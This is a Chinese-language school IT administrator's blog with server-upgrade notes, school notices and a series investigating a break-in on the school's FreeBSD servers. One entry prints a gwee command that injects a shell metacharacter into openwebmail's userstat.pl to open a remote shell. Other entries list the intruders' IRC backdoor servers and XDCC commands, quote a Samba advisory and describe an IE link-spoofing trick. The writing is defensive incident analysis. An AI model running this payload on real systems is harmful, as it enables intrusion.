新版的 port 套件的啟動方式

最近 FreeBSD 的 ports 套件常常無法在開機的時候自動啟動，都要自己手動啟動。
經察看各相關設定檔之後才發現，現在通常要把啟動的東西寫進 /etc/rc.conf 中。

這樣一來管理就更方便了，相當不錯！

網路黑暗期

自從數月前伺服主機開始不穩之後，我就開始籌畫資料轉移的準備。我們的主伺服器是一台 PIII 的 PC，卻要負擔整個校內幾乎所有的網路活動，顯示它的效能非常好而且穩定。

但是兩個月前發現系統遭到駭客入侵，最主要的原因是我這一年來非常忙碌，沒有辦法在第一時間修補漏洞，因此導致駭客有機可趁。追查駭客的來源過程已有部分的文章貼在我的網站上。

這一個月來嘗試將系統的資料轉移至另一台伺服器，最終的目標是由兩台機器同時運行，以減輕彼此的負擔。但由於原系統的架構過於龐大，所以屢次功敗垂成。

我幾年前在規劃網路的時候，就已經預料到將有一天必須將這些功能切割到不同的機器上，所以每一樣加進去的功能都有考慮這些因素，但想不到實際要做轉移的時候還是發生了不少問題。這是因為我在這些年中又加入了許多的整合性。「可分割性」跟「整合性」一直都是相衝突的。

目前已經完成大多數的工作，網路黑暗期也差不多快過去了，我現在要開始進行收尾的工作，把測試過程中所產生的垃圾除去，並進行最佳化。 這次進行的升級工程最大的如下：

* FreeBSD 4.10 升到 FreeBSD 5.3
* Apache 1.x 升到 Apache 2.x
* PHP4 升到 PHP5
* MySQL 3.x 升到 MySQL 4.x
* phpbb 2.0.4 升到 phpbb 2.0.11

每一樣都是挑戰，我在整理之後將陸續貼在我的網站上。

不過，最令人高興的是，真的有變快很多了，不是嗎？

ACM 註冊方式

程式設計的練習網站 ACM

原始網址：http://acm.uva.es/problemset
註冊簡介：http://163.23.148.11/IT/ACM/
資料來源：http://163.23.148.11/

參考資料：洪朝貴教授網站，參考「演算法」。

[SAMBA] CAN-2004-1154

好可怕，又來一個原子彈級的漏洞了！

[SAMBA] CAN-2004-1154 : Integer overflow could lead to remote code execution in Samba 2.x, 3.0.x < = 3.0.9

[[MORE]]

Remote exploitation of an integer overflow vulnerability
in the smbd daemon included in Samba 2.0.x, Samba 2.2.x,
and Samba 3.0.x prior to and including 3.0.9 could
allow an attacker to cause controllable heap corruption,
leading to execution of arbitrary commands with root
privileges.

Successful remote exploitation allows an attacker to
gain root privileges on a vulnerable system. In order
to exploit this vulnerability an attacker must possess
credentials that allow access to a share on the Samba server.
Unsuccessful exploitation attempts will cause the process
serving the request to crash with signal 11, and may leave
evidence of an attack in logs.

==================
Patch Availability
==================

A patch for Samba 3.0.9 (samba-3.0.9-CAN-2004-1154.patch)
can be downloaded from

http://www.samba.org/samba/ftp/patches/security/

The patch has been signed with the "Samba Distribution
Verification Key" (ID F17F9772).

RSS 閱讀

Firefox 配合有 RSS 供稿的網頁非常方便，但如果你想讀取某個沒有提供 RSS 的網頁呢？
有人寫了一個介面： 易玄小築 Super RSS 服務

相關的討論串在這裡： 沒支援的網站也能 RSS

對了，我個人是用 Firefox 的 Sage 讀 RSS 網頁，很好用喔！

第二次段考成績查詢完成

第二次國中的第二次段考成績查詢已經完成了。

大家可以開始查成績囉！

聲音錄製軟體

剛好有人問到，所以在此解答一下。

我用過幾個好用的聲音錄製軟體，最建議的是 Goldwave。推薦的理由是「它是免費的」。我相信可以做到大部分錄音該做的事情，付費註冊之後的功能完全版則可以享有更多音效處理的功能。如果系統內已經有 mp3 的 codec，就可以把聲音存成 mp3，要不存成 ogg 也是不錯。

另一套叫做 CoolEdit 2000 是由 www.syntrillium.com所發行，但剛剛連到他們網站，發現這套軟體已經被 Adobe 收購了，目前叫做 Adobe Audition。以前 CoolEdit 功能很強大，但常常被它氣個半死，因為一個小動作都有可能毀掉錄了幾個小時的成果，尤其它的 「undo」功能根本是假的，真是超危險的軟體。現在有了 Adobe 的品質保證，我猜想會好很多吧。

Mini PC

[轉載信件]

現在的移動辦公設備越來越小，功能越來越強大，超便攜是筆記本和PDA的界限開
始出現了模糊。 Vulcan Inc.是美國一家開發新型移動設備的公司。在上周，
Vulcan公司創辦人Paul G.Allen（他同時也是Microsoft的共同創辦人）在西雅圖
宣佈其公司開發的一款能完全運行Windows XP系統卻只有手掌大小的FlipStart
Mini PC將在今年的DEMOmobile展會上正式對外發佈。

　　DEMOmobile2004展會將於今年9月8日到10日在美國亞利桑那州舉行。PaulG.
Allen同時向公眾作了一次FlipStart Mini PC的預視展示。這是世界上第一款完全
擁有Laptop（筆記本電腦）處理能力卻只有 Palm/PPC尺寸的劃時代產品，無疑將
會造成對當今主流手持移動設備的巨大衝擊。

[[MORE]]
下面將針對這款革命性產品，作一次較為詳盡的介紹。

基本配置：
作業系統：Microsoft Windows XP Home/Professional
體積：5.8"x4"x1"(148mm x 101mm x 26mm)
重量：450克（無外接設備情況下）
1GHz處理器（具體型號廠商沒有透露）
256MB系統實體記憶體
30GB 硬碟空間
3D圖像處理/8MB 顯存
全功能QWERTY拇指鍵盤/可自定義命令熱鍵
5.6"HDTV品質顯示屏 (解析度1024 x 600)
持續2-6小時電力壽命的鋰電池
內置802.11b(11 Mbps)/g(54 Mbps)無線網卡
USB 2.0接口
內置麥克風和擴音器及附帶耳機
內置 130 萬像素數碼攝像頭

　　從Flipstart MiniPC公佈的配置上看，性能和功能毫不遜色於目前的主流筆
記本電腦，更將Palm與PPC等PDA遠遠拋諸腦後。然而，這款真正意義上的掌上電腦
的特性和功能遠不止這些。

1、運行於掌中的Windows XP

　　這款Mini PC最大的特點莫過於能夠輕鬆駕馭Microsoft Windows XP了。運
行XP作業系統所需要的硬體要求曾經連桌面系統和筆記本電腦都敬畏三分，而如今
Vulcan公司已經成功地將它移植到這一部只有手掌大小的迷你型電腦上面。如此高
的系統配置相對於其小巧的體積來說可謂讓人瞠目。雖然450克的重量與現時的PDA
相比還是重了些，但一點也不影響



其他內容請參見這裡：
世界上最小的筆記本電腦

論文搜尋系統

Google 的新服務，超強論文搜尋系統。
如此一來可以避免在茫茫網海中過濾一堆垃圾，以後學生抄作業又更輕鬆了.... :P

http://scholar.google.com/

Gmail 提供 pop 及轉寄服務

不好意思，我太後知後覺了。

如此一來， gmail 成為天下無敵的免費信箱。容量大功能又多，別家有的它都有，它有的別家常常沒有。

Embeded Programming

You can write programs to run on the PDA or mobi-phone with the resources.

• Download eMbedded Visual C++ 4.0


• Windows CE .NET (4.x) Downloads


• Download WinCE (5.0 now)


• Developer Resources for Windows Mobile 2003 Second Edition


• SDK for Windows Mobile 2003-based Pocket PCs


• eMbedded Visual Tools 3.0 - 2002 Edition

超好用快速鍵

我以前看過完整的列表，但現在已經忘記了，不過剛好有人在某頻道提到就做個筆記好了。

微軟的「視窗鍵」+

e: 檔案總管
d: 所有視窗全部隱藏
f: 搜尋
r: 執行

Openwebmail 出狀況

錯誤訊息如下：

Open WebMail ERROR

Sessionid cookie 不正確，拒絕存取. 請檢查是否瀏覽器 cookie 功能未開或是重複登入.


找出原因：硬碟爆了。現已處理完畢。

駭客入侵事件簿3

因為我們的縣網擋掉 6667，結果剛好使得他們的後門失去作用。

經過檢查，httpd 果然是 iroffer 的設定檔，他讓這個 server 自動連往以下的 irc server

[[MORE]]
server 207.36.47.119 6667
server irc.rizon.net 6667
server irc.rizon.org 6667
server 69.22.163.105 6667
server 69.56.199.206 6667
server 69.56.199.206 6670

並且加入這個 channel：

channel #ReVoLuTiOn -plist 45

加入 channel 的時候，使用的是這個身份：

user_nick Rev|JeV|86
user_realname By JyV
user_modes +ix
loginname eXpLoIt

我當然就用了 IRC 軟體連入那個 channel，果然發現他們的大本營。
我們的系統成為一個分享檔案的伺服器，這個集團用被入侵的機器放各種 DVD 影片、MP3、遊戲等等資源在上面，你只要在那個 channel 裡面對後門下個指令，該後門就會自動把你要的東西丟給你。

我又循線查到這個網站： （我剛剛上去網頁已經被拿掉了）
http://utenti.lycos.it/buyo3/

從這個網頁顯示的資訊，可以推論出他們是義大利籍的集團，（都用義大利文咩，網址也是 .it）這個網頁列出所有的資源，真的是蠻可怕的，至少有幾百 GB 的東西分享在上面，而且下載速度都很快。

你找到自己想要下載的東西之後，只需要在在 IRC channel 中下指令：

/msg ReV|DivX|214 xdcc info #19 （可以查 214 這個後門裡的第 19 號檔的資訊）
/msg ReV|DivX|214 xdcc send #19 （下載第 19 號檔）
/msg ReV|DivX|214 xdcc remove (還沒試）


他們也許嫌 irc 有點麻煩，所以還寫了專用的工具：
http://www.over-software.net/revolution/ （誰可以幫我翻譯義大利文啊？）

檔案搜尋引擎：
http://ircspy.com/directory.asp?mode=showbots&networkid=159&channelid=17440

student 主機的主要漏洞修補完畢

student 主機因為還有加 ipfw，所以稍微安全一點，損害較輕，但也被 w00t 進去了。

目前 remote 型的漏洞大概補得差不多了，但過程中停機了超過十五個小時，有點小遜，都是因為太久沒更新所致。

修復機器

今天一到學校就忙著修機器，似乎所有的重要主機大家約好了，一起掛掉。

最近常有這種事，到底是怎麼了啊？

get/set/delete registry using C#

Accessing registry is very simple in C#. You can read the articles:

• All (you wanted to know) about the Registry with C#


• Working with Registry in .NET


• Quick Registry class in C#

[[MORE]]

My sample code:

RegistryKey rkHKLM = Registry.LocalMachine;
RegistryKey rkRun;

try{
rkRun = rkHKLM.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run",true);
listBox1.Items.Add( rkRun.GetValue("NeroFilterCheck") );
}
catch{
MessageBox.Show("Error! I can't create the registry.");
rkHKLM.Close();
return;
}


Google Hacking Database

Google is a very good tool for hacking. Many many secrets can be found in the google database.

Johnny collected the google hacking database, and wrote a book.

http://johnny.ihackstuff.com/

There are many resources about google here: http://douweosinga.com/projects/googlehacks

加班到現在

一大堆事情，加班到現在，我一定是瘋了...

本校首頁升級至 phpnuke 7.5

SECTIONS modules has been removed on this version. All our data from Sections module has been moved to CONTENT Module.

Themes updated.
Modules updated.
Blocks updated.
Topic Images updated.
Calendar Images updated.
Calendar case and admin modules updated.
Forums updated.
gallery updated.

The forum module is upgrade to BBtoNuke 2.0.11 which can be download from http://www.nukeresources.com/.

安裝 FreeBSD 5.3 Release 2

我在 build kernel 的時候出現這樣的錯誤：


perl5 /usr/src/sys/kern/vnode_if.pl -h /usr/src/sys/kern/vnode_if.src
perl5:No such file or directory


我也覺得奇怪，為什麼編譯核心會需要用到 perl？perl 不是早就被踢出 FreeBSD 5 了嗎？
原來是自己耍寶，cvsupfile 把它設定成 RELENG_4 了。

安裝 FreeBSD 5.3 Release

我在 Acer 的 Altos Server 上裝好 FreeBSD 5.3 了。 5.2 之前一直抓不到它的 RAID，所以沒辦法裝，現在終於可以了。

決定把 web 服務移往該伺服器上面。

[[MORE]]
第一個要裝的 ports，是 cvsup，結果因為 dependency 的關係，它自己裝了一堆有的沒有的，變成下面這樣：

cvsup-without-gui-16.1h General network file distribution system optimized for CVS
expat-1.95.8 XML 1.0 parser written in C
ezm3-1.2 Easier, more portable Modula-3 distribution for building CV
gettext-0.13.1_1 GNU gettext package
gmake-3.80_2 GNU version of 'make' utility
libiconv-1.9.2_1 A character set conversion library
libtool-1.3.5_2 Generic shared library support script (version 1.3)
libtool-1.5.8 Generic shared library support script (version 1.5)

還有重複的 libtool ，真糟。

Hacks In Taiwan 2005

小弟接下來要參與第一屆 Hacks In Taiwan 駭客年會 的籌備。
這是台灣網路安全、駭客界的第一盛事，屆時有許多傳說中的人物會出席此研討會。
如果各位知道有任何可以提供捐款的企業，或是能幫上忙的話，請不吝提供資訊。

我們需要兩樣東西： 捐款，以及論文。

Call for paper 將在明年初開始進行，此研討會的時間則訂於明年七月。有任何可公開的進一步的消息，將會在這裡公布。

新的 mod_php4 安裝方式

FreeBSD 底下安裝 mod_php4 的方法作了大幅更改，如果原先有裝舊的套件的人，直接做 portupgrade 可能會發生大地震。 （就是在說我啦！）

[[MORE]]
安裝方式可以參考：

• Apache_Mysql_Php4


• ports_apache_modssl_php_mysql_phpmyadmin


• Build a Dynamic Web Serving Platform with FreeBSD

但如果要支援 MySQL 則必須加裝 /usr/ports/lang/php4-extensions/

/usr/ports/lang/php4 跟 /usr/ports/www/mod_php4 裡面裝的只是基本的 php4 環境，想要增加別的功能還得透過 php4-extensions 才行。

至於 php4-extensions 我測試過後，預設也沒有裝 MySQL 支援，即使你在選單中打勾也一樣，必須再裝 /usr/ports/databases/php4-mysql 才可以。請參考 FreeBSD 官網的相關討論。

如果 php4 沒有裝 MySQL 支援，可能出現的錯誤訊息為：
Fatal error: Call to undefined function: mysql_pconnect() in /home/httpd/anteil/php/touchpoint/include/db.inc on line 66

php 的相關設定可以透過 phpinfo() 來檢視。

這次停機三天的源由

由於本校伺服器遭駭客入侵，而且情形比我原本想像的還嚴重許多，所以停機 1. 保存證據 2. 升級系統 並 3. 修補漏洞。

目前追查到兩個駭客組織，一個是有名的 w00t，另一個是來自義大利的駭客集團。

由於這一年來實在很忙，所以疏於管理，才讓駭客有機可趁，另一方面，有不少系統套件都改變格式了，所以就地升級行不通，只好一個一個重新研究，又花了不少時間。

URL spoofing bug in Microsoft Internet Explorer

IE 又出問題！
我可以設計一個連結，讓你不知不覺被導到別的網站。

[[MORE]]

下面是兩個不同的方法，看起來好像是連到 msn，可是點下去卻連到 google。（觀察一下 IE 下方的狀態列吧！）

Visit Msn!

Visit Msn!

頒獎典禮-隨拍隨印

今天是地檢署「快樂平安fun暑假頒獎典禮」。由我們學校承辦。
我和柯志杰及美術班兼任張老師，一同負責拍照之後立刻洗成照片，然後當場拿給受獎者作為紀念。

列印一張相片近兩分鐘，可能一個獎項有八、九個人獲獎，光這個獎項印出來就需要花掉將近二十分鐘，可是那麼多獎，怎麼有辦法很快都印完呢？

原本預估的時間足夠，但後來一堆受獎者都提早走，導致他們來不及拿到照片，有點可惜。不過這次又給了我們承辦大型活動的經驗，也許下次跟照相館合作，可以效率更好一點。

Photos Archived today

2004/11/09 上午 11:11 000000校史室資料
2004/11/12 下午 04:44 040722國一新生訓練
2004/11/12 下午 04:44 041023家長座談會
2004/11/12 下午 04:44 041027全縣國語文頒獎
2004/11/12 下午 04:44 041027電腦教室A驗收
2004/11/06 下午 04:25 041030校慶運動會
2004/11/04 上午 08:12 041102後備軍人輔導處頒發獎學金
2004/11/12 下午 04:03 041108資賦優異知能研習
2004/11/12 下午 04:44 041110音樂大師班
2004/11/12 下午 04:57 041111樹鵲蹤跡
2004/11/12 下午 04:44 041112獲校務發展協進會獎助學金同學
2004/11/13 下午 06:17 041113家長座談會
2004/11/13 下午 11:06 041113時尚髮藝闖雲林
2004/11/17 下午 07:59 041114主教盃
2004/11/17 下午 07:56 041116許倩倫結婚

Printer Management

We need the solutions to manage our print quota. Some teachers say that they want a high speed laser printer, but someone waste papers and the ink. If you have any idea, tell me please.

http://cmtw.canon.com.tw/product/esolution/Product.asp?ProductID=00000133
http://www.xerox.com.tw/web/content/products/pro01_03_show.jsp?SN=13

An Outlook Bar Implementation

Illustrates in a step-by-step manner the design and implementation of an Outlook style icon bar.

Look: An Outlook Bar Implementation

Blog成企業頻寬黑洞？

Blog成企業頻寬黑洞？

摘錄：
上月微軟公司曾以佔用頻寬過多為由，決定縮減自家網站上與整合內容的開發人員blog，這一問題引起了許多人的關注。微軟公司決定不再向blog 訂戶發送「微軟開發者網路」（MSDN）上的完整張貼文章的內容，而要求用戶點選一個連結後才能夠閱讀全部內文。不過由於自家開發人員激烈反對，微軟公司後來收回了這一成命。

gmail 大贈送

我手上有幾個 google 的 1GB 大容量信箱，如果有需要的話，請在本文下方留言。

因為數量不多，所以以常上本網站、或是時常留言者、或是對本校資訊服務有貢獻者優先獲得。

註：但直接把 E-mail 貼在我的網站上並不是好事，因為可能會被廣告商拿去發垃圾信。建議將 @ 改成 AT 或是其他的字元，我看得懂就可以了。
比如 ray1974.AT.ms95.url.com.tw 或是ray1974小老鼠ms95點url點com點tw 之類的。

BBS 的魔咒2

換兩個新的 SCSI 硬碟之後，一樣沒辦法抓到，所以直接送電腦公司處理，他們也搞不清楚怎麼回事，所以轉送給聯強去檢查。

我看我們還是不要用 SCSI 硬碟好了，反正一樣會掛，用 IDE 的好了。

bugtraq Advisories in Nov

The most important subjects are listed here, you can check the security mailing lists.

• [ GLSA 200411-10 ] Gallery: Cross-site scripting vulnerability


• Microsoft Internet Explorer permits to examine the existence of local files


• [ GLSA 200411-09 ] shadow: Unauthorized modification of account information


• MDKSA-2004:119 - Updated MySQL packages fix multiple vulnerabilities


• local buffer overflow in htpasswd for apache 1.3.31 not fixed in .33?


• [USN-11-1] libgd2 vulnerabilities


• [USN-5-1] gettext vulnerabilities

FreeBSD 5.3-RELEASE Announcement

http://www.freebsd.org/releases/5.3R/announce.html

04 1111電信機房施工 網路將斷線

茲因中華電信斗六機房於十一月十一日上午 5:30 至 6:30 之間施工，屆時以 FTTB 光纖上網學校 網路將暫時中斷。

結論是，我們不受影響。

heart1 限制存取

heart1 應只將 heart1 (H:) 當作是檔案暫時的分享空間，而不應該將重要資料存放其上。

目前已將 heart1 限制行政電腦方可存取，這是行政會報的決議結果，不便之處請見諒。

041110 工作紀要

• 處理生命教育中心的照片並上網：早療體驗、靜萱體驗、探望承杰、玫瑰經之夜


• 訓育組照片整理： 93 初一新生訓練


• 註冊組資料檔上網。


• 謝小姐的電腦開關機有問題，處理完畢。


• Adobe Premiere 研究。


• 高三齊活動 DV 轉檔

Firefox 1.0 出爐！

恭賀！

Firefox 1.0 正式版出爐了！ 於此同時，Thunderbird 0.9 Release也出來了！

可惜 piaip 去當兵了，所以中文版暫時不知道什麼時候可以推出，目前全世界各地開始舉行 party 來慶祝這件事了，絕對是網路界的大事啊！

CNet 相關新聞：

• Mozilla推出Firefox 1.0


• 研究：Firefox持續追趕IE


• 專訪Firefox 設計師：實用至上


• 換個瀏覽器吧！（上)--火狐逆襲！

wordpress 防 spammer

之前就已經提過 wordpress 防廣告留言的方式，這裡也有一個連結整理得還不錯：

• WordPress: Combat Comment Spam


• 改檔名 ，這一招很簡單，但很有用。

駭客入侵事件簿2

雖然系統上的 openwebmail 已經修補起來了，但比較麻煩的是在 Forum: 0 day rumors 有人提到，OpenWebmail 還有一兩個 remote exploit 還有 local root exploit 尚未被發表。什麼時候會爆出來還不知道，希望到時候不會哀鴻遍野。

接下來的工作是追查入侵來源，以及系統內到底被修改了多少東西。這是很冒險的作法，比較快的方法是立刻重灌 (最安全的方法)。但我實在想知道這個入侵我們機器的駭客到底在想什麼，以及他還有沒有什麼絕招可以學的。

[[MORE]]
我又在 /var/tmp/.tmp 裡頭發現一個新的後門程式。owner 一樣是 www，從這裡可以發現，駭客大概還沒有拿到系統的 root （最高管理者帳號）。這裡有一個檔案：

-rwxr-xr-x 1 www wheel 206516 Aug 27 03:17 perlmail

是一個被編譯過的可執行檔。但我去分析裡面的內容之後，發現它是一個 IRC 用的 file server 的偽裝，這個軟體的名字叫做： iroffer。引述該網站上的話：

What is iroffer?
iroffer is a software program that acts as a fileserver for IRC. It is similar to a FTP server or WEB server, but users can download files using the DCC protocol of IRC instead of a web browser.

Unlike similar programs, iroffer is not a script, it is a standalone executable written entirely in c from scratch with high transfer speed and effeciency in mind. iroffer has been found to transfer over 50MByte/sec over a gigabit ethernet connection.

駭客還蠻聰明的，既然他只能拿到 www 的權限，那後門當然得偽裝成 www 有在持續執行的東西，才不會被發現。但也有人這麼說：除了系統啟動檔或軟體設定用的目錄之外，凡是用 . 開頭的資料夾通常有鬼。這個駭客就把他的東西放在一個 .tmp 的資料夾中。

/var/tmp/.tmp 資料夾內容如下：
-rw-r--r-- 1 www wheel 6 Sep 4 23:46 admin.pid
-rw-r--r-- 1 www wheel 1004 Aug 27 03:17 httpd
-rw-r--r-- 1 www wheel 164 Nov 8 00:46 mybot.state
-rw-r--r-- 1 www wheel 164 Nov 8 00:46 mybot.state~
-rwxr-xr-x 1 www wheel 206516 Aug 27 03:17 perlmail*
drwxr-xr-x 2 www wheel 512 Aug 27 03:16 up/

看一下 admin.pid 裡面只有一個數字： 54136
代表的是這個執行中的後門程序：
power# ps ax | grep 54136
www 54136 ./perlmail -s -n -b httpd

查了一下 54136 的程序：

power# lsof -p 54136
lsof: WARNING: compiled for FreeBSD release 4.9-STABLE; this is 4.10-STABLE.
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
perlmail 54136 www cwd VDIR 13,131076 512 253959 /var/tmp/.tmp
perlmail 54136 www rtd VDIR 13,131072 512 2 /
perlmail 54136 www txt VREG 13,131076 206516 253996 /var/tmp/.tmp/perlmail
perlmail 54136 www txt VREG 13,131077 85876 492140 /usr/libexec/ld-elf.so.1
perlmail 54136 www txt VREG 13,131077 28432 342286 /usr/lib/libcrypt.so.2
perlmail 54136 www txt VREG 13,131077 580604 342352 /usr/lib/libc.so.4
perlmail 54136 www 0u VCHR 2,2 0t0 7823 /dev/null
perlmail 54136 www 1u VCHR 2,2 0t0 7823 /dev/null
perlmail 54136 www 2u VCHR 2,2 0t0 7823 /dev/null
perlmail 54136 www 3u IPv4 0t0 TCP no PCB, CANTSENDMORE, CANTRCVMORE
perlmail 54136 www 4u unix 0xd098c920 0t0 ->(none)
perlmail 54136 www 7u unix 0xd09c7400 0t0 ->(none)


目前正在執行中的後門程式：

power# ps ax | grep perlmail
www 24643 ./perlmail -s -n -b httpd
www 54136 ./perlmail -s -n -b httpd
www 66177 ./perlmail -s -n -b httpd
www 66435 ./perlmail -s -n -b httpd


有趣的是，同一個目錄中的 httpd 竟然是一個 ASCII 的純文字檔，應該就是 iroffer 的設定檔。也就因為它是一個純文字的設定檔，所以這個後門的設定開始逐漸明朗起來...

041105 工作紀要

完成明天資賦優異學生專業知能研習的三張海報。改了又改，而且要把它放大到全開大小，只好切割成一張一張。

啊～誰有可以啟動的 photoshop CS 可以借我？ （正版）

國中成績 教師查詢 完成

今天完成程式：

國中成績查詢 - 教師版

這個程式有一個最大的貢獻是，以後可以使用老師們自己的電子信箱來做網頁存取，他們可以方便改變自己的密碼，而且一碼行遍天下。下次要把學生的也改成這樣。

可惡！

今天因為 php 程式裡面漏寫了一個關鍵字 function，訊息又不足，害我找了兩個小時之久！

041103 工作紀要

這裡填的工作有的是昨天或前天的，因為沒時間記。
我自己的電腦總算恢復得差不多了，沒有自己的輸入法就跟殘廢了是差不多的。現在工作環境建立起來之後，工作速度就可以稍微增加一點了。

• 協助音二甲病痛學生就醫。


• 訓育組、體育組、生活團、、生命教育中心的網址空間建立。


• 自然科能力競試-資訊科 的訓練進入最後一個禮拜，目標是一個四名內，一個佳作。


• 團購 mp3 player 已經結案。


• 我自己的工作電腦系統重建。最花時間。


• 修復教師郵局無法進入的問題。原因是硬碟爆掉。


• 週六的國中小資賦優異特教研習的手冊封面及封底設計完成，並已付印。


• 丁椿琳老師 Notebook 當機問題修復，原因是微軟新注音造成不穩。


• 新電腦教室採購驗收結案。


• 辜郁恬、李佩茹、蔡少宸三位教師帳號建立。


• 今年度的初一新生網站作品展示區程式修改完成，初二的在這裡，高二的在這裡。


• 運動會照片整理，大約有將近 800MB 的資料，不久就可以上網了。


• 教導吳昌倫老師使用讀卡機，以後國文科就有種子教師了。


• 我的硬碟損壞評估出爐，交給行政會報去決定是否要花大錢修這個硬碟。


• 協助初一意受傷學生就醫。（最近我的課不太平靜啊～ 一直在跑醫院...)

國中學生成績查詢系統差不多完成

由於國中現在採用九年一貫的學科成績計算，所以舊的成績查詢系統不敷使用。

於是我重新撰寫 國中成績查詢系統 的程式，現在已經大致上完成。

還沒完成的部分則是：

1. 要重新設計介面的外觀


2. 增加老師查詢全班成績的功能


3. 增加加權比值的說明。


4. 還有讓使用者也能自己修改密碼。

[[MORE]]
將成績檔案轉成 csv 格式之後，再將之匯入 MySQL 資料庫之中，採用的語法是：

LOAD DATA INFILE '/var/tmp/phpXyyliT' INTO TABLE `shsh_scores` FIELDS TERMINATED BY ',' ENCLOSED BY '"' ESCAPED BY '!' LINES TERMINATED BY 'rn'

也就是說，我改用 驚嘆號! 作為 Escape 字元，這是為了取代原本用反斜線當作跳脫字元的設定。（不會有人的名字中含有驚嘆號吧？那也太帥了。）如果預設使用反斜線當作跳脫字元，則可能造成某些字元，例如許功蓋這些字會變成亂碼。

BBS 的魔咒

BBS 現在已經是整台全新的機器，跟電腦教室用的一樣。

硬碟也換掉了，SCSI 卡也換掉了。最不可能壞掉的 SCSI 排線也換掉了。沒有一樣是舊的。

但還是抓不到硬碟。很傷腦筋，修電腦最怕的就是同時壞兩樣東西。全換新的之後還是有東西是壞的，那就很難檢查。

所以 BBS 復站又要再等了。

有人報名參加 BBS 維護

高一心 陳明軒 nice_cookie_2000.AT.yahoo.com.tw
高一齊 李長益 q35120.AT.yahoo.com.tw

這兩位同學，還有一位高二同學，我忘了留下姓名。大家很熱心想要參與 BBS 的維護。
不過目前比較麻煩的是，訓練的時間很長，等訓練完，應該也早就修好了吧。

所以可能要在 BBS 修復之後，才開始訓練。重點是 FreeBSD 系統的管理。

新電腦教室 A 正式啟用

從今天開始，電腦教室 A 正式啟用。

可惜第一班初二某班上完之後，清出一大堆垃圾，還有人把食物醬料灑在地板上，真令人嘆息，不知道那麼多人忙那麼久是為了什麼...

莫非定律

這真的是莫非定律。

總是殷殷勸諫他人應時常備份自己的資料，我自己卻沒有這樣做，於是今天我的硬碟死掉之後，我進正心這幾年來所有的文件及數位照片全數消失。辦公用的電腦也暫時沒辦法運作了。

既然自己的電腦不能用了，只好多花一點功夫來弄 BBS，BBS 似乎被下了惡咒，整個安裝過程中一直非常不順利，老是狀況百出。比如說，我拿了一片新的空白光碟，燒了 FreeBSD 4.10 Release 的安裝片，安裝到後來老是在某個地方失敗，看起來是硬碟 slice 分割有點問題，所以在做完 newfs 這個動作，開始把東西放進硬碟中時，就出現各種錯誤訊息。

後來才發現是安裝光碟片有問題。從七月多維修 BBS 到現在，沒有一個零件是完美無缺的運轉，不是那裡出問題就是這裡出問題。這次新電腦終於來了，從頭到腳沒有一樣不是新的，就連放著舊資料的也是之前剛換過的新硬碟。但還是裝不起來，有一兩個同學看到學校首頁我的徵求站長公告，來找我看能不能幫忙，但很可惜我知道他們幫不上忙，只好又打發他們走了，但還是非常謝謝你們！

目前系統暫時是起來了，但存放 BBS 舊資料的 SCSI 硬碟卻抓不到（應該說曾經抓到過，然後就消失了）。現在又暫時沒輒了，我最近運氣真的不太好，還是少摸點電腦好了。

WordPress 防廣告留言

今天晚上我一上這裡，就發現這個地方被塞了快一百篇的廣告留言(comment spam)。

這種廣告商很討厭，它會利用搜尋引擎自動找出安裝 WordPress 的網站，然後用機器人程式自動在網站上留言，目的是為了提高他們網站的曝光率（比如說 Google 上的排名往前移）。

反制的方法也有不少人在討論，比如說這個 Word Press Blacklist Comment Spam Plugin，或是 How to combat comment spam with WordPress。

但我覺得這些方法都很麻煩，反正機器人看不懂人類的圖片，就讓留言者每次留言時，都要輸入經過「人類測試」，要看一張圖片，確定圖片中的字母，依序輸入。

其實這個方法我早在本校網站首頁上就已經在使用了，比如說這個管理者登入網址。

我在這裡找到了有相同想法的人寫的程式：WordPress Hack: AuthImage，我已經把這個程式用在這個網站了，所以各位如果要留言的話，必須輸入圖片中的字母喔～

其實這個程式寫得不夠好，因為他要改不少東西，如果可以做成 plug-in，隨插即用就更好了。

產生短網址

剛剛幫本站弄了一個簡短網址：http://0rz.net/ba00f

這其實只是轉址的功能，很簡單。
你可以在這個網站：http://0rz.net，輸入一個長的網址，它就會丟一個短的網址給你。

這有什麼好處呢？ 當你轉貼這些連結的時候，可以不會超出一頁的範圍，比如說在 bbs 裡面就特別好用。不用叫使用者還得自動把被斷行的網址接起來。

除了上述提供的網站，國外還有另一個提供相同功能的網站：http://tinyurl.com/。

更有趣的是，竟然也有人提供把網址變長的服務：http://www.hugeurl.com/。

駭客入侵事件簿1

目前大概已經整理出駭客入侵的路線了。

我一開始是看到 www 這個使用者，一直有在執行 crontab，它會不斷的去呼叫 /var/spool/uucppublic/sh。
這顯然是一個後門程式，所謂的後門就是駭客入侵之後，為了避免當時用來入侵的漏洞被修補起來，所以打開的一道後門，供日後方便進出該機器。

[[MORE]]
我使用 lsof 去觀察這個檔案，及其開啟的檔案或者網路 port，發現它會連到這個地方：
ccadam.com:6665

因為最近很忙，所以一直沒有去注意最近被發表的漏洞，只知道駭客是利用網頁的服務進來的，可是本校的網頁實在太多，到底哪一隻程式出問題，其實也不曉得。只好先隨便猜測，然後找看看有沒有對應的 advisory。還好，沒有花太多時間就鎖定了一隻有漏洞的程式：openwebmail，也就是我們的網路郵局。

根據 Hackwire上的資料，有一個不錯的 exploit 工具：Gwee，可以幫助我去驗證這個漏洞。

gwee (Generic Web Exploitation Engine) is a small program written in C designed to exploit input validation vulnerabilities in web scripts, such as Perl CGIs, PHP, etc. gwee is much like an exploit, except more general-purpose.

要入侵具有漏洞的 openwebmail 系統，只需要下這個指令：

gwee -L -y'loginname=%3B' -llocalhost -p31337 http://target/cgi-bin/openwebmail/userstat.pl

該程式會在 localhost 去 listen 31337 這個 port，然後傳回一個受害端的 shell，這個 shell 是以 www 的身份在執行的。

由於學生郵局有較嚴格的防火牆設定，所以這個工具沒辦法生效。（雖然還是有機會繞過防火牆來執行 exploit）但首頁用的主機我為了提供更高的效能，所以沒有架防火牆，因此成為目標。

現在已經將 openwebmail 都更新到最新版了。有漏洞的版本包括 OpenWebmail 2.20+ (2.20, 2.21, 2.30 confirmed) 。

駭客如果要找受害者，真的容易到了極點，不講太明了。

041021 工作紀要

• 新電腦教室已經開始安裝了。協助測試其中的大漢天威卡，及其還原功能。


• 跳舞時代 電影放映師。


• 尋找駭客入侵的蛛絲馬跡，及其可能的入口。

代理伺服器不穩中

proxy 有問題，不過不是我們的有問題，而是縣網中心的 proxy 有問題。但由於他是我們的上游，所以我們校內上網，只要有設定 proxy 的都會受到影響。

其他工作摘要：

